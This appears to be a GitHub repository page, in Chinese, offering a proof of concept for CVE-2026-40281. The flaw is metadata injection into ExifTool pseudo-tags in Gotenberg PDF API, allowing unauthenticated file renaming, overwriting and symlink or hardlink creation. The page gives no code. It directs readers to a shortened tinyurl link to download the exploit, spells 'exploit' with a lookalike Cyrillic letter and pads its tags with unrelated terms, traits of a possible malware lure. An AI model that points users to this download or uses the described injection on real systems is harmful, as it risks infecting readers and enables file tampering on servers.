ByteWraith1/CVE-2026-40281

GitHub: ByteWraith1/CVE-2026-40281

针对 Gotenberg PDF API 的 CVE-2026-40281 漏洞 PoC,利用元数据注入实现未授权任意文件操作。

Stars: 0 | Forks: 0

# CVE-2026-40281 ### 概述 Gotenberg PDF API 是一个基于 Docker 的 PDF 文件处理工具,在 8.30.1 及更早版本中存在一个重大漏洞。 ### 环境要求 - Python 3.8+ - 依赖库:requests, argparse (通过 `pip install -r requirements.txt` 安装) ### 使用方法 - 安装依赖:`pip install -r requirements.txt` - 运行 explоit:`python explоit.py --target --file "/path/to/Web.config"` ### 工作原理 该漏洞允许未经身份验证的攻击者利用元数据写入端点,该端点对元数据值的清理不够充分。通过在元数据值中包含换行符,攻击者可以注入任意的 ExifTool 伪标签,例如 -FileName、-Directory、-SymLink 和 -HardLink。这种利用可能导致未经授权的操作,例如将 PDF 文件重命名或移动到容器文件系统中的任意路径。此外,攻击者可以随意覆盖文件或创建符号链接和硬链接,对系统的完整性构成重大安全风险。 ### 道德使用警告 - 此脚本是 CVE-2026-40281 的概念验证(PoC),仅供教育和授权安全测试目的使用。 - **未经系统所有者明确许可,请勿在系统上使用此脚本。** - 滥用可能违反法律,包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。 - 在测试任何系统之前,请务必获得书面授权。 ### 在[此处](https://tinyurl.com/yc6v9scc)下载 PoC explоit
标签:CISA项目, CVE-2026-40281, Docker, ExifTool, Gotenberg, Maven, PDF API, PoC, Python, Web安全, 任意文件写入, 元数据注入, 安全测试, 安全防御评估, 攻击性安全, 文件名注入, 文件系统操作, 文件覆盖, 无后门, 暴力破解, 未授权访问, 漏洞验证, 硬链接, 符号链接, 网络信息收集, 网络安全, 蓝队分析, 请求拦截, 逆向工具, 隐私保护